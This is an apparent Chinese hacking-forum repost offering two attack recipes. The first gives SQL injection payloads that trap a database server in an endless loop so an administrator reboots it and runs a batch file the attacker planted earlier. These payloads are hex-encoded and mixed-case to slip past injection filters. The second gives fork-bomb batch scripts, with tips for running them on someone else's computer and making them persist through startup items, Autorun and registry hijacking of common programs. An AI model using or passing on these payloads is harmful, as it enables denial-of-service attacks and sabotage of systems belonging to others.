注入死循环
来源:华夏 同盟
有时候,我们通过数据库备份一个批处理到启动菜单后,希望服务器在下次重启时运行我们的批处理,
令服务器重启的死循环
。可是我们等啊等,服务器就是不重启,怎么办? 让管理员帮我们重启一下吧。呵呵以下注入代码让服务器停止响应,或响应很慢,要取得更好的效果,请丢到注入点后多执行几次。最终管理员会重新启动服务器。
数字型注入点:
;wHiLe 1<9 bEgIn select cHaR(0) eNd--
文本型注入点:
';wHiLe 1<9 bEgIn select cHaR(0) eNd--
或者以 Declare + EXEC 的方式来执行:
;dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--
';dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--
以上代码在数据库服务器上制造死循环导致服务器资源被耗尽进而拒绝服务。 管理员会帮你重启服务器。
注:以上代码具有攻击性,请谨慎使用。
注:其中的 select char(0) 可以改成 select power(1.23456,100) 以加大计算量。
-----------------夹烟占位--------------------
;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--
这句的意思是当1小9开始将0这个反转ASCII码。因为是恒成立的所以是个死循环。一直到机器资源用尽
改字符大小是为了绕过网站的过滤防注入。
;declare @s varchar(8000) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)--
declare @s varchar(8000)定义@s为varchar型长度8000。将“wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd”用HEX编码后符值给@s,再用exec执行。。
作用同样是绕过网站的过滤防注入
';wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--
加'因为他是字符型注入。反正我是解说不清楚了。
select power(1.23456,100)返回1.23456的100次方根,不死才怪呢
concat函数就是将里边的字符区别大小的的串联起来,benchmark(9999999999999,md5('test')报告客户端的运行经过时间,
电脑资料
《令服务器重启的死循环》(https://www.unjs.com)。盲注时也许有用。我不知道concat函数对攻击起什么作用? w hex编码0x77 benchmark(9999999999999,md5(0x77) 这样也许能绕过防注入
乱写一气大牛见笑
----------------------------------------------------------------------------------------------------
死循环之ping增强版
来源:色萝卜's bolg
建议在虚拟机上试验
或者在别人的电脑上运行改批处理
她可以让她的电脑立马无法响应过来
而不得不重启机器
如果你还毒的话可以把她放到启动项中
还毒的话加一个Autorun文件,open=这个批处理路径
再毒的话在注册表中镜像劫持掉,让她点击QQ、MSN、IE等常用工具既
激活批处理
让她折腾去
双核也测试过,只能重启,反映响应比以前简单的写个
loop循环还要强N倍
呵呵
还来不及敲shutdown -a
关闭组等操作哦
纯属娱乐
对系统文件无伤害
重启后无碍
附件中有我测试时的源文件,懒的话可以下载哦
附源文件内容
注两个文件解压到同一目录下
启动.bat
@echo off
color 2f
echo.
title 死循环之ping增强版-zzw制作
echo ####################################################################
echo # 死循环之ping增强版-zzw制作 #
echo ####################################################################
echo.
:loop
start zzw.bat
goto :loop
echo 启动完成
zzw.bat
@echo off
ping 127.0.0.1 -l 65500 -t
附前人死循环批处理
@echo off
:loop
start cmd.exe
goto :loop
当然:有人会问为什么不把CMD.exe换成其他的应用程序呢,可以的,但是前提你要知道她电脑有那些大的应用软件